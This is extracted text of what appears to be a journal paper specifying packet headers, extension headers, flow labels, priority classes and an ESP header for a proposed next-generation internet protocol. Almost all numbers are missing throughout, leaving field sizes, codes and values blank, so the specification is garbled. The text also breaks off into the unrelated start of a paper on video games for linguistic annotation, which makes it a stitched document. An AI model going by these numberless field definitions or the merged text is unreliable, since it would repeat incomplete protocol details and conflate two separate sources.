mut (maximum transmission unit): the maximum transmission unit that can be transmitted on a section of link, namely the maximum data packet length in eight-bit group. ) path mut: the smallest mut of all links in the path between the source node and the destination node. note: for a device with multiple interfaces, it can be configured to forward non-self-directed packets from one of its interfaces and drop from other interfaces. when such a device receives data from a previous interface or interacts with a neighbor, the protocol requirements of the host must be followed. b. ipv header format the format design of ipv datagram header is shown in table . table i. ipv header format version number category type flow label address length priority class communication authentication address absolute communication payload length next header hop limit source address ( - bit) destination address ( - bit) time authorization code international journal of advanced network, monitoring and controls volume , no. , the design of table is explained below. ) version number: the length is bits, representing the internet protocol version number. for ipv , this field must be . ) category type: the length is bits, the high bits are used to specify the address length, its volume is to , and it’s to the power. contains address length of byte ~ byte; the default value is bits, where is bits, is bits, is bits, is bits, is bits, is bits, is bits, and is bits. the last five bits specify the communication class and authentication for the source and destination addresses. to is used to specify the priority class of the communication, to is used to specify the communication method after the first authentication, which is used by the packet sending place for control and whether the source address and destination address authentication is needed. to are used to specify absolute communication that will not fall back when congestion is encountered, and are used for virtual circuits. and are used to assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. the other values are reserved for future use. ) flow label: with a length of bits, it is used to identify packages belonging to the same business flow. ) payload length (net load length): the length is bits, including the net load byte length, that is, the number of bytes contained in the packet after ipv header. ) next header: the length is bits. this field indicates the protocol type in the field following the ipv header. ) hop limit: the length is bits, and this field is subtracted one each time a node forwards a packet. ) source address: the length is bit ~ bit, and the sender address of ipv packet is specified. adopt the method of variable length and uncertain number digits. ) destination address: the length is bit ~ bit, and the destination address of ipv packet is specified. adopt the method of variable length and uncertain number digits. ) time: it is used to control the lifetime of the address in the header. ) authorization code: it is used to identify the authenticity of the address in the header. c. extended headers of ipv in ipv datagrams, internet optional information is placed in specialized headers which between the packet ipv header and the high-level protocol header. the number of such extended headers is not too much, and each identified by a different value for the next header. an ipv packet can have zero to more than one extension header, each of which is defined in the next header s field in the previous header, as shown in table . table ii. extended header format ipv header label next header =tcp tcp header +data ipv header label next header = route routing header next header =tcp tcp header +data ipv header label next header = route routing header next header = data segment data segment header next header =tcp tcp data segment header +data international journal of advanced network, monitoring and controls volume , no. , on the path of the packet passing, no node to checks or processes the extended header until the packet reaches the node specified by the destination address field in the ipv header (or, if it is a multicast address, it would be a group of nodes). for the normal multiplexing of the next header field of ipv header, the processing module is called to process the first extended header. if an extended header does not exist, the high level header is processed. therefore, the extension headers must be processed exactly in the order in which they appear in the packet, and the receiver cannot scan the packet to find a particular extension header and process it before processing other preceding headers. if a node, after processing the header wants to process the next header, but it does not recognize the value of the "next header" , it will lost the packet, and sends the source a "icmp parameter problem" message, the message icmp code has a value of (can't identify the "next header" type), "icmp indicator" contained in the field could not identify the "next header values" offset location in the original packets. the same is done if a node finds the "next header" field is in any non- ipv header. each extended header is an integer multiple of the -bit array so that subsequent headers can be aligned along -bit array boundaries. in the extended header, the fields made up of multiple -bit groups are internally aligned with their internal natural boundaries, that is, the position in the fields of width n -bit groups are placed at the beginning of the header, an integer times n -bit groups, where n= , , or . the fully installed ipv includes the following extension headers:  hop-by-hop option(segment options)  routing(type )  fragment;  destination options;  authentication;  encapsulating security payload. this paper defines the first four extension headers, and the next two additional definitions. ) the sequence of extension headers when multiple extension headers are used in the same packet, they appear in the following order: a ipv header; b segment options header; c destination options header(annotation ); d routing header; e data segment header; f authentication header; g encapsulate security load header; h destination option header(annotation ); i the upper header; annotation : options for the first destination node to appear in the ipv destination address field and for subsequent destination nodes listed in the routing header. annotation : the option to be processed only by the destination node of the packet. each extended header can occur at most once, but destination option headers can occur at most twice, once before routing headers and once before high-level headers. if the high-level header is another ipv header (that is, when ipv is encapsulated in another ipv tunnel), it can be followed by its own extended headers, which, as a whole, follow the same sequence. when defining other extended headers, it must specify a sequential relationship between them and the headers listed above ) options when the extension header is defined the segment- by-segment option and the destination option header have an unequal number of options encoded in the form of type length value (tlv). the format is shown in table . international journal of advanced network, monitoring and controls volume , no. , table iii. option format option type option data length option data where, option type: -bit identifier. option data length: -bit unsigned integer. it is the length of the data field for this option, in -bit groups. option data: variable length field, the data is related to the option type. the order of the options in the header must be handled in strict accordance with the order in which they appear in the header. the receiver cannot scan the header for a particular type of option and cannot process it before processing all previous options. the option type identifier is internally defined, and its highest two bits specify what must be done if the node handling ipv cannot identify the option type. : skip this option and continue with the header. : abandon the packet. : abandon the packet and send a "icmp parameter problem, code ," message to the source address, regardless of whether the destination address is a multicast address, indicating that the option type is not recognized. : abandon the packet. only when the destination address of the packet is not a multicast address, send a message of "icmp parameter problem, code " to the source address, indicating the type of option it cannot recognize. the high third bit of the option type specifies whether the data for this option can change on the way to the destination of the packet. : option data cannot be changed during transport. : option data can be changed during transport. when the authentication header appears in the packet, when calculating the authentication value of the packet, the whole field in which any data can change in the way is treated as an -bit group of all zeros. each option can have its own alignment requirements to ensure that the values of multiple -bit groups in the option data field fall to the natural boundaries. the alignment of the choices is required in terms of xn+y, the option type must be an integer multiple of x -bit groups plus y -bit groups from the beginning of the header. such as: n means the offset is any multiple of two -bit groups from the beginning of the header. n+ means the offset is any multiple of eight -bit groups from the beginning of the header plus two -bit groups. ) pad option a) pad option(alignment requirement: none) notice: the format of the pad option is a special case where there is no length field or value field. the pad option is used to insert an -bit group of fill bits in the header option field. b) padn option if need to fill out multiple -bit groups, it should be used the padn option instead of multiple pad options. the padn option format (alignment requirement: none) is shown in table . table iv. padn option format option data length option data the padn option inserts two or more -bit groups of fill bits into the header option field. to fill in n -bit groups, the value of the option data length field should be n- , and the option data field contains n- all- - bit groups. ) segment options header international journal of advanced network, monitoring and controls volume , no. , segment options header is used to carry the option information that must be checked and processed by all nodes on the path the packet travels through. in ipv , the header of each network segment option is represented by the value of the next header is , as shown in table . table v. segment options header format next header the extension length of the header options next header:it's an -bit selector. it is used to identify the header type just following the each segment header option. it is the same value as the ipv protocol field [rfc- ]. the extension length of the header: it is an -bit unsigned integer. the length of the header of each segment option, in -bit groups, does not include the first -bit group. option: variable length field whose length makes the length of each segment header an -bit integer multiple. it contains one or more tlv encoding options. in addition to the pad and padn options specified above, the large load options (alignment requirement: n+ ) are defined, as shown in table . table vi. large load option format option data length heavy load length the large load option is used to send ipv packets with a load length of more than , -bit groups, the large load length is the length of the packet, in -bit groups, excluding ipv headers but including segment option headers, it has to be greater than , . if a packet with a large load option is received and the large load length is less than or equal to , a message of "icmp parameter problem, code " is sent to the source node, pointing to the high bit of the invalid large load length field. if the packet has a large load option, the load length in the ipv header must be set to . if received a packet that contains both a payload length option and an ipv payload length field that is not , it need to send a message to the source node with "icmp parameter has a problem, code " and pointing to the large payload option type field. the large load option cannot be used in packets with segment headers. if the data segment header is encountered in the packet containing the high-load option, a message "icmp parameter problem, code " will be sent to the source node, pointing to the first - bit group of the data segment header. if the installed ipv does not support the large load option, it does not have an interface to a link with mtu greater than (ipv header with -bit groups, plus g -bit group loads). ) routing header ipv uses the routing header to list one or more intermediate nodes that needs to be accessed on the path of the packet to the destination node. this function is very similar to the source routing options of ipv . the routing header is identified by the next header field whose previous header median value is ; the format is shown in table . table vii. routing header format next header length of the extension header routing type remaining data segment data related to type next header: it's an -bit selector. it use the same value as the ipv protocol field [rfc- ]. length of the extension header: it is an -bit unsigned integer. the routing header length is in -bit groups, does not contain the first -bit group. international journal of advanced network, monitoring and controls volume , no. , routing type : the route header variable's -bit identifier remaining data segment: it is an -bit unsigned integer. the number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. data related to type: it is a variable length field, whose format is determined by the route type, its length makes the entire route header an integer, multiple of the -bit group. if a node encounters an unrecognized routing type value while processing the received packet, the action that the node will take depends on the value of the remaining data segment field. it includes the following two cases: a) if the value of the remaining data segment field is , the node must ignore the routing header and continue to process the next header of the packet. the header type is given in the header field next to the routing header. b) if the value of the remaining data segment field is not , the node must abandon the packet and send a message of "icmp parameter exists problem, code " to the source address of the packet, pointing to the unrecognized routing type the format of the route header for type is shown in table . table viii. type routing header format next header length of extension header routing type = remaining data segment reserve strict/loose bit innuendo address [ ] address [ ] …… address [n] next header: it is an -bit selector. its identity follows the routing header type. it uses the same value as the ipv protocol field [rfc- ]. length of extension header: it is an -bit unsigned integer. the routing header length is in -bit groups that does not contain the first -bit group. for routing headers of type , the header extension length is equal to twice the number of addresses in the header and is an even number less than or equal to . routing type is . remaining data segment: it is an -bit unsigned integer. the number of remaining routing data segments, that is, the number of intermediate nodes explicitly listed, which are the nodes to be accessed before reaching the final destination node. the maximum effective value is . reserve: it is an -bit reserved field. the sender initializes it to , and the receiver ignores the field. strict/loose bit innuendo: to from left to right. for each routing data segment, indicate whether the next destination address must be the neighbor of the previous node: indicates strict (must be neighbor), indicates loose (need not be neighbor). address [ …..n]: it’s a -bit address vector, value from to n. multicast addresses cannot appear in routing header packets of type or in routing header packets of type in the destination address field of ipv . if the value of the zero bit of the strict/loose bit innuendo is , the destination address field in the ipv header of the original packet must indicate a neighbor of the source node. if the zero bit is , the sender can international journal of advanced network, monitoring and controls volume , no. , use any legal, non-multicast address as the initial destination address. ) data segment header ipv source hosts use segment headers to send mtu packets that are longer than the packet delivery path. different from ipv , in ipv , only the source host completes the segmentation, rather than the router on the path of the packet. the data segment header is identified by setting the next header to in its previous header, as shown in table . table ix. data segment header format next header reserve data segment offset reserve m identifier next header: it is an bit selector. the initial header type (defined below) that identifies the data segment portion of the original packet. use the same values as the ipv protocol fields [rfc- ]. reserve: it is an -bit field. it is initialized to zero at the sender and ignored at the receiver. data segment offset: it is an -bit field. the number of bytes moved forward or backward from the specified position. m: flag indicates that there are more data segments, and indicates the last data segment. identifier: it has -bit field. in order to send mtu packets whose length is longer than the transmission path, the source node can split the packet into several data segments and send each data segment as a separate data packet, and then reassemble the data packet at the receiver. for each packet to be segmented, the source node generates an identifier value for it. any piece of data in any recently delivered packet with the same source and destination addresses must have a different identifier. if a routing header is present, the destination address being considered is the final destination address. ) destination options header the destination option header is used to carry the option that only needs to be checked by the packet's final node. the destination option header is identified by the header before it, with the next header field value of ; the format is shown in table . table x. header format of destination address options next header length of extension header option next header: bit selector. this is an identifier type of header that follows the destination option header. use the same value as the ipv [rfc- ]. length of extension header: it is an -bit unsigned integer. the destination option header length is in -bit groups, and does not contain the first -bit group. option: it’s a variable length field, whose length makes the destination option header length an integer multiple of -bit group. it contains one or more tlv encoding options. optional destination information in ipv packets is encoded in two ways: defined in the destination options header, or as a separate extended header. data segment headers and authentication headers are two examples of the latter. which one to take is depends on the action if the destination node could not recognize the option information. international journal of advanced network, monitoring and controls volume , no. , a) if the destination node operation is want to abandon packets, and only in the destination node address of the packet is not the multicast address, then send the packet source address a "icmp unrecognized type” message, and then these messages can be encapsulated into a separate header, or destination option in a header option, and the highest two digits of the option type are . this choice depends on a number of factors, such as fewer bytes, better alignment, or easy to parse. b) if both operations are required, the messages must be encoded as an option at the head of the destination option, whose option type has a highest two digits is , , or , specifying which actions will be take. note: when the next header field of an ipv header or any extended header is , which means there's nothing behind the header. if the ipv header payload length field indicates that there are -bit groups after the next header field of , these -bit groups must be ignored, and the content is passed as is when the packet must be forwarded. iii. packet length design ipv requires a minimum of mtu per link on the internet. on any link, if it cannot pass -bit groups in one packet, then the data segment and reassembly associated with the link must be supported by the hierarchy below ipv . for each link directly connected to the node, the node must be able to accept packets as large as mtu. links with configurable mtu (such as ppp links [rfc- ]) must be configured with at least -bit groups, and larger mtu is recommended to accommodate possible encapsulations (such as tunnels) without fragmentation. ipv nodes are recommended to implement path mtu discovery [rfcc- ] in order to discover and take advantage of mtu links larger than . however, a minimal ipv implementation (such as in a bootrom) can simply restrict itself from sending packets larger than and omit the path mtu discovery implementation. in order to send mtu packets with a length greater than the link, the node can segment the packet at the source node and assemble it at the destination node by using the data segment header of ipv . however, this fragmentation is not recommended in any application unless it can resize packets to fit the mtu of the link being measured. a node must be guaranteed to accept segmented packets that exceed bytes after reassembly, including ipv headers. however, a node must ensure that it does not send segmented packets larger than bytes after reassembly unless it is explicitly told that the destination node can assemble such a large packet. when sending an ipv packet to an ipv node (that is packets go through the transition from ipv to ipv )), the ipv source node may receive an "icmp packet too big" (icmp packet is too big) message reporting that next-hop mtu must be less than . in this case, ipv does not need to reduce the size of subsequent packets to less than , but must include a segment header in those packets so that the ipv -ipv conversion router can obtain an appropriate identifier value for the constructed ipv . this means that the load can be reduced to -bit groups ( minus bytes for ipv headers and bytes for data segment headers) or even smaller if additional extended headers are used. in order to send mtu data packets whose length is longer than the link, such as audio, image and video, long-stream code and absolute return code can be selected. the node can use the data segment header of ipv to identify the data packets in the source node without segmentation and assemble them in the destination node. however, when the sender and the receiver receive the signal disconnected by the return code, they will return to normal working condition. international journal of advanced network, monitoring and controls volume , no. , note: unlike ipv , ipv does not require a "don't fragment" flag in the packet header to perform path mtu discovery, which is an implicit feature of ipv . and the process associated with using mtu in rfc- is not applicable to ipv , because the message of ipv "datagram too big" is always identifies the exact mtu being used. also, the procedures associated with the use of mtu tables in rfc- are not applicable to ipv because the ipv version of the "datagram too big" message always identifies the exact mtu being used. unlike ipv and ipv , ipv can transmit the practical applications such as audio or video, it need to use the ever-flowing code and absolute return code, thus formed in the reserved the actual circuit actually has become a three layer structure, so there is no try to transfer the concept of content as guaranteed delivery channels and reliable safety, guarantee the transmission content don't interrupt. this results in the co-existence of the three - and four-tier architectures within the ipv network. iv. flow label a data flow is a sequence of packets sent from one source to another destination address (point-to-point or multicast), and the source nodes require the intermediate router to have special control over these packets. these special processes can be transferred to routers through control protocols, such as resource reservation protocols, or through the information carried by the packets themselves in the data stream, such as segment options. there may be multiple active streams between a pair of source and destination nodes, as well as many communications independent of any flow. a flow is uniquely identified by a combination of a source address and a non-zero flow label. the flow label field for packets that do not belong to any flow is set to . the flow label is assigned by the source node of the data flow. new flow tags must be randomly selected (pseudo random), ranging from to (decimal). the purpose of the random assignment is to make the bits in the flow label suitable for use as hash keys in routers to find the relevant state of the flow. all packets belonging to the same flow must be sent with the same source node address, destination node address, priority, and flow label. if any of these packets contain a segment option header, they must all have the same segment option header content. if any of their packets contain a routing header, all of their extended headers preceding the routing header must have the same content, including the routing header (except for the header field next to the routing header). allows, but does not require, the router and destination node to check whether the above requirements are met. if a collision is detected, it should sending "icmp parameter has a problem, code " message and then pointing to the high bit of the flow label (i.e., within the ipv packet with an offset of ). routers are free to set the flow control state of based on "timing" even when there is no explicit flow control protocol, segment options, or other methods provide them with flow creation information. for example, when a flow label with an unknown, non-zero label is received from a particular source node, the router can process its ipv header and any other necessary extension headers as if the flow control label were . the flow control state described above, after being set and cached according to "timing" must be discarded within seconds, whether or not packets of the same class continue to arrive. if another packet with the same source address and flow control label arrives after the cache state has been discarded, then the packet must undergo full normal processing (as if the flow control label is ), this process may cause the flow control state of the flow to be re-established and cached. the lifetime of explicitly established flow control states, such as flow control states created by control protocols or segment options, must be specified as part international journal of advanced network, monitoring and controls volume , no. , of the explicit establishment mechanism and can exceed seconds. during the lifetime of any flow control state that was previously created, the source node must not use this control label for new flows. since any flow control state created depending on "timing" has a lifetime of six seconds, the minimum time between the last packet of a flow and the first packet of a new flow to use the same flow label is six seconds. the flow label has a longer lifetime and cannot be reused for new flows during the lifetime. when a node is off and restarted (for example due to a system crash), care must be taken to avoid using flow label that it might have used for previously created flow that have not yet expired. this can be achieved by record flow label in the memory, so that it can recall flow label previously used after a system crash, or until the previously created, there may be one of the biggest lifetime timeout before does not use flow label (at least for seconds, if it use an explicit flow and establish a mechanism, and specifies the longer life span, even longer time). if the reboot time of a node is known (usually more than seconds), the amount of time to wait before starting to allocate flow tags can be deducted accordingly. v. category type design the -bit category type field in the ipv header enables the source node to identify the desired level of packet delivery determination, certainly relative to other packets sent from the same node. category type bits contain two parts: bits high is used to specify the address length, the value is ~ , is to the power, the address length is byte ~ byte; the default value is bits, where is bits, is bits, is bits, is bits, is bits, is bits, is bits, and is bits. the last five bits specify two ranges of communication categories, with values ~ used to specify the information priority provided by the source node for congestion control, that is, the priority of information sent with a delay in the face of congestion, such as tcp information. ~ are used to specify the priority of messages that are sent without delay in the face of congestion, that is, the priority of "real time" packets that are sent at a fixed rate. for crowd-constrained information, the following priority values can be used for specific application classes. : non-character information, : fill in the information (such as: net news), : unattended information (such as: email), : reserve, : large quantities of supervised information (such as: ftp、nfs), : reserve, : interactive information (such as: telnet, x), : internet control information (such as: routing protocol, snmp), : for audio, : for video, : for video or audio compression will not be error due to alignment error, : broadcast with audio and video, : emergency use. for messages that are not congested, the lowest rating value of should be used for packets that the sender most wants to discard in crowded conditions (such as high-fidelity video messages), and the highest rating value of should be used for packets that the sender least wants to discard (such as low-fidelity audio messages). there is no corresponding sequential relation between the rank of un-crowded and the priority of crowded. international journal of advanced network, monitoring and controls volume , no. , vi. upper protocol design a. upper protocol check if any transport protocol or other upper layer protocol includes the address in the ip header when calculating its checksum, then in order to be able to run on ipv , the algorithm that calculates the checksum must be modified to include addresses with a length of - bits rather than -bit ipv addresses. tcp and udp headers for ipv are shown in table . table xi. tcp and udp headers for ipv source address destination address time identify code payload length next header  ) if the packet contains the routing header, the destination address in the pseudo-header is the final address. in the source node, this address is the last address in the routing header; at the receiver, this address will be in the ipv header address field. ) the value of the next header in the pseudo- header identifies the upper protocol (e.g., tcp is , udp is ). if there is an extended header between the ipv header and the upper protocol header, the value of the next header in the pseudo-header is different from the value of the next header in the ipv header. ) the value of the load length field in the pseudo- header is the length of the upper protocol packet, including the upper protocol header. if there is an extended payload between the ipv payload and the upper protocol payload it will take less payload length than the ipv payload length (or in the large payload option). ) different from ipv , when a udp packet is sent from an ipv node, udp checksum is not optional. that is, whenever an ipv node sends a udp packet, it must calculate the udp checksum. the checksum is generated by the packet and pseudo-header, and if the result is , it must be converted to hex ffff and placed in the udp header. the ipv receiver must abandon the udp packet containing the checksum and record the error. the checksum of icmp version of ipv includes the above pseudo-header in its verification and calculation. this is a modification of the ipv version of icmp, which does not include a pseudo-header in its verification and calculation. this change is made to ensure that icmp is not passed incorrectly or corrupted by the ipv header fields on which it depends, which, unlike ipv ; these fields are not checked and protected by the internet layer. the next header field in the pseudo-header of icmp contains the value , which identifies the ipv version of icmp. b. maximum packet lifetime unlike ipv , ipv nodes like ipv do not require a mandatory maximum packet lifetime. this is why the "lifetime" field of ipv has been renamed ipv 's "segment limit". in practice, very fewer ipv complies with the current packet lifetime, so this is not a practical change. any protocol that relies on the internet layer (whether ipv or ipv ) to limit the lifetime of packets should be upgraded to rely on its own mechanism to detect and discard stale packets. c. maximum upper layer load when calculating the maximum load available for upper level protocol, it must be taking into account that the ipv header is larger than the ipv header. for example, in ipv , tcp's mss option is calculated by the maximum datagram length (the default value obtained through path mtu discovery) minus -bit groups ( -bit groups for the minimum length of ipv headers and for the minimum length of tcp headers) from. when using tcp over ipv , the mss must be calculated by the maximum length minus -bit groups, because the minimum ipv header (when international journal of advanced network, monitoring and controls volume , no. , ipv without an extended header) is -bit larger than the minimum ipv header. vii. format of options it is required to design the fields first when designing new options for segment option headers or destination option headers; these are based on the following assumptions. ) any field in the option data of an option that consists of multiple -bit groups should be aligned with their natural boundaries, that is, fields with n -bit groups of width should be placed at integer multiples of n -bit groups from the beginning of the segment header or destination option header, where n= , , , or . ) each segment header or destination option header takes up as little space as possible and must meet the requirement that the header length is an integer multiple of an -bit group. ) it can be assumed that when any header with options appears, they only have a fewer options, usually only one. these assumptions mean that it needs planning the individual fields of an option, arrange the fields from smallest to largest, with no padding in the middle, and then derive the alignment requirements for the entire field based on the alignment requirements for the largest field. examples are given below. case . if option x requires two data fields, one with a length of -bit groups and one with a length of - bit groups, it should be arranged according to table . table xii. two field design table option type =x option data length = four -bit group fields eight -bit group fields its alignment requirement is n+ to ensure that the eight -bit fields start with an -fold offset from the header. the full segment header or destination header with the above options is shown in table . table xiii. full header or destination header format next header length of extension header = option type =x option data length = four -bit group fields eight -bit group fields case . if option y requires three fields, one with a length of four -bit groups, one with a length of two - bit groups, and one -bit group, the format is shown in table . table xiv. three field design format option length=y option data length = one -bit group fields two -bit group fields four -bit group fields its alignment requirement is n+ to ensure that the four -bit leader fields start at a times offset from the header. the full hop-by-hop or destination option header with the above options is shown in table . international journal of advanced network, monitoring and controls volume , no. , table xv. a three-field full data format next header length of extension header = pad option = option type =y option data length = one -bit group field two -bit group fields four -bit group fields padn option= option data length = case . the segment header or destination header for each option x and option y in both case and case should be one of the following two formats, depending on which option appears first, as shown in tables and . table xvi. one format of contain both two - and three-field address next header length of extension header = option type=x option data length = four -bit group fields eight -bit group fields padn option = option data length = option type=y option data length = one -bit group fields two -bit group fields one -bit group fields padn option= option data length = table xvii. another format of contain both two - and three-field address next header length of extension header = padn option= option type=y option data length = one -bit group fields two -bit group fields four -bit group fields padn option= option data length = option type =x option data length = four -bit group fields eight -bit group fields viii. encapsulate security payload header design a. format of encapsulate security payload header esp (encapsulating security payload) header is designed to provide mixed security services in ipv . the esp mechanism can be applied with the authentication header or in a nested manner in tunnel mode alone. security services may be provided between a pair of communicating hosts, or between a pair of communicating security gateways, or between a security gateway and a host. the primary difference between the authentication header and the esp mechanism is the effective area service. the encapsulation security payload mechanism does not protect any ip header fields unless they are encapsulated by the esp, such as in tunnel mode where the ip header is encapsulated underneath. the encapsulation security header is inserted after the ip header. in transport mode, the encapsulated security header is in front of the upper layer protocol header, and in tunnel mode, the encapsulated security header is in front of the encapsulated ip header. international journal of advanced network, monitoring and controls volume , no. , esp mechanisms provide services such as confidentiality, data origin authentication, connectionless integrity, anti-replay services (a form of partial sequence integrity), and limited communication confidentiality. the business provided by this mechanism depends on the options and the location of the application when the security association is established. confidentiality can be independent of other business options. however, the use of confidentiality alone without integrity authentication can lead to attacks that compromise the confidentiality of communication. data origin authentication and connectionless integrity are federated services that can be provided as an option along with confidentiality services. the anti-replay service can only be selected if the data origin authentication service is selected, which is entirely up to the receiver. the confidential service requires selection in tunnel mode, and this service is most effective when it used in the security gateway, because the clustering of communication on the gateway may mask the true source and host address modes. note that while both confidentiality and authentication services are optional, at least one of them should be chosen. a protocol header (ipv header, ipv base header, or extended header) that precedes the esp header will have a value of in its protocol field (if ipv header) or in its next header field (if it is the ipv extended header). the format of esp groups and headers is shown in table . table xviii. format of esp groups and headers security parameters index(spi) sequence number payload data(variable length) fill field( ~ b)) pad length next header authentication data(variable length) note: the scope of the certification business is the part before the certification data (authentication data is not included); the scope of the encryption service provided is the portion of the data that follows the serial number and precedes the authentication data (serial numbers and authentication data are not included). b. description of safe load format the fields in the header format are explained below. the "optional" of the text indicates that if the field is not selected, the field is ignored and is not used when calculating the overall check value. if "required", this field must appear in the esp group. ) security parameters index(spi) it is a required field of bits. this field is associated with the security of the datagram that uniquely identifies the address of the address ip and the security protocol. the value of the spi can be any, currently from to is reserved by iana (). the value of spi is reserved for local, specific application use. ) sequence number it is a bit monotonically increasing counter (serial number). this field is required even if the receiver does not select to enable the playback service for a particular security association. the processing of this sequence number field is entirely done by the receiver, that is, the sender must transmit this field, and the receiver may or may not comply with the field. when a security association is established, both sender and receiver counters are set to . if the anti- replay is started (default is enabled), the serial number international journal of advanced network, monitoring and controls volume , no. , transferred does not allow loops. therefore, after a secure association group, the sender and receiver counters must be reset. ) payload data it is a variable-length field that contains the data described by the next header field. the payload field is required and is an integer multiple of bytes in length. ) fill field this field is used for encryption. the purposes of use fill fields in the esp header are as follows. a) if an encryption algorithm requires the body to be an integer multiple of bytes, the padding bytes are used to the body. (in addition to the filling fields themselves, the payload data, the filling length, and the next header fields are also included) to meet the data length requirements of the encryption algorithm. b) even without considering the requirements of the encryption algorithm, fields need to be filled in to ensure the length of the encrypted data terminates at the boundary of b. in particular, the length of the fill length field and the next header field must be aligned to b. c) apart from above algorithmic and alignment requirements, padding fields may also be used to hide the true length of the payload and partially encrypt the communication. however, this additional padding obviously consumes bandwidth resources and should be used with caution. the sender can add to the b to the fill field. padding is optional in an esp group, but all applications must support the generation and use of padding fields to satisfy the encryption algorithm for the length of the encrypted data while ensuring that the authentication data is aligned to the b boundary. d) pad length this field is required, and the valid fill length value should be from to , with indicating no fill bytes. e) next header this field is required and is an -bit field indicating the data type in the payload data field. f) authentication data it is a variable-length field that contains the group's integrity check value (icv), which is calculated from the esp group except the authentication data. this field is optional and only occurs if the authentication business is included in the security association. the authentication algorithm must account for the full length of the verification value and the relative rules of validation and processing steps. c. processing of security payload header encapsulated security payloads (esp) are used in two ways: transport mode or tunnel mode. ) transmission mode transmission mode applies only to host applications. in this mode, the esp header only protects the upper layer protocol and not the ip header field. in this mode, the esp header is inserted after other ip headers and before the upper layer protocols of tcp, udp, and icmp. in ipv , the esp header is treated as an end-to-end payload, so the header must appear after the hop-to-hop, route, and segment headers. the host option header may appear before or after the esp header, depending on the semantics required. the locations of the esp headers in a typical ipv packet in transport mode are shown in tables and . table xix. datagrams before the application of esp header basic header extension header(if any) tcp data international journal of advanced network, monitoring and controls volume , no. , table xx. datagram after the application of esp header basic header hop-to-hop, destination header route header segment header esp destination options header tcp data esp trailer esp authentication the encrypted portion of the above packet can be a basic header encryption or a host option header, tcp, data, and esp tail. the authenticated part in addition to the above part is encrypted, but also the package security load. ) tunnel mode the esp header in tunnel mode can be used for host or security gateway. tunnel mode must be used when the esp header is applied to the security gateway to protect the user's transmission communication. in tunnel mode, the "lower" ip header carries the final source and destination address, while the "upper" ip headers contain the other addresses, such as the address of a security gateway. in tunnel mode, the esp header is positioned relative to the "upper" ip header as it is in transport mode. the position of the esp header in a typical ipv packet in tunnel mode is shown in table . table xxi. esp headers in typical ipv packets in tunnel mode upper basic header upper extension header (if any) esp lower basic header upper extension header (if any) tcp data esp trailer esp authentication in the above group, the encrypted part can be the upper basic header, the lower basic header, the lower extended header, tcp, data and esp. the authenticated part in addition to the above part is encrypted, but also the esp. ix. conclusion this paper is a specific research and design scheme of rfc and rfc for the future network. the -layer routing address space is described according to the document in rfc . ipv has a routing hierarchy of up to layers, and this routing hierarchy is a key feature in its wide application. in order to protect previous investments, ipv and ipv compatible addresses have been set inside, with layers - designed for ipv and ipv compatibility and layer described in the rfc document. the large number of address spaces in ipv also makes it possible to allocate addresses in a direct way in order to the application of ip mobile, iptv, ip phone, internet of things and other network applications that need to use arabic numerals to represent and need to use characters that do not have to be analyzed again, this design also designed a character router. ipv address length is designed according to the document of rfc that the network address length is bits in the future network, and the address space length is designed as bits according to the actual demand, thus solves the address space capacity problem in the next years. in order to meet the technical demand of rfc and rfc , the definitions of routing hierarchy, address length, address working mode, address space international journal of advanced network, monitoring and controls volume , no. , resource, address text representation method, compression definition and separator were redefined, please refer to other related articles of this design team. references [ ] tang xiaodan etc. computer operating system (third edition) [m]. xi’an: xidian university press, . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] rfc - internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks. rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] v. cerf, network working group. a view from the st century, rfc . . . [ ] xie jianping, xu dongmei, etc. digital domain name specification. sj/t - , . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] wang wenfeng, xie jianping, etc. product and service digital identification format for information procession. sj/t - , . . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . . it’s all fun and games until someone annotates: video games with a purpose for linguistic annotation david jurgens and roberto navigli department of computer science sapienza university of rome {jurgens,navigli}@di.uniroma .it abstract annotated data is prerequisite for many nlp applications. acquiring large-scale annotated corpora is a major bottleneck, requiring sig- nificant time and resources. recent work has proposed turning annotation into a game to increase its appeal and lower its cost; how- ever, current games are largely text-based and closely resemble traditional annotation tasks. we propose a new linguistic annota- tion paradigm that produces annotations from playing graphical video games. the effec- tiveness of this design is demonstrated using two video games: one to create a mapping from wordnet senses to images, and a sec- ond game that performs word sense disam- biguation. both games produce accurate re- sults. the first game yields annotation qual- ity equal to that of experts and a cost reduc- tion of % over equivalent crowdsourcing; the second game provides a . % improve- ment in accuracy over current state-of-the-art sense disambiguation games with wordnet. introduction nearly all of natural language processing (nlp) depends on annotated examples, either for train- ing systems or for evaluating their quality. typi- cally, annotations are created by linguistic experts or trained annotators. however, such effort is often very time- and cost-intensive, and as a result cre- ating large-scale annotated datasets remains a long- standing bottleneck for many areas of nlp. as an alternative to requiring expert-based anno- tations, many studies used untrained, online work- ers, commonly known as crowdsourcing. when successful, crowdsourcing enables gathering anno- tations at scale; however, its performance is still lim- ited by ( ) the difficulty of expressing the annota- tion task as a simply-understood task suitable for the layman, ( ) the cost of collecting many anno- tations, and ( ) the tediousness of the task, which can fail to attract workers. therefore, several groups have proposed an alternate annotation method us- ing games: an annotation task is converted into a game which, as a result of game play, produces an- notations (pe-than et al., ; chamberlain et al., ). turning an annotation task into a game with a purpose (gwap) has been shown to lead to better quality results and higher worker engagement (lee et al., ), thanks to the annotators being stimu- lated by the playful component. furthermore, be- cause games may appeal to a different group of peo- ple than crowdsourcing, they provide a complemen- tary channel for attracting new annotators. within nlp, gamified annotation tasks include anaphora resolution (hladká et al., ; poesio et al., ), paraphrasing (chklovski and gil, ), term associations (artignan et al., ) and dis- ambiguation (seemakurty et al., ; venhuizen et al., ). the games’ interfaces typically incorpo- rate common game elements such as scores, leader- boards, or difficulty levels. however, the game it- self remains largely text-based, with a strong resem- blance to a traditional annotation task, and little re- semblance to games most people actively play. in the current work, we propose a radical shift in nlp-focused gwap design, building graphical, dy- namic games that achieve the same result as tradi- tional annotation. rather than embellish an annota- transactions of the association for computational linguistics, ( ) – . action editor: mirella 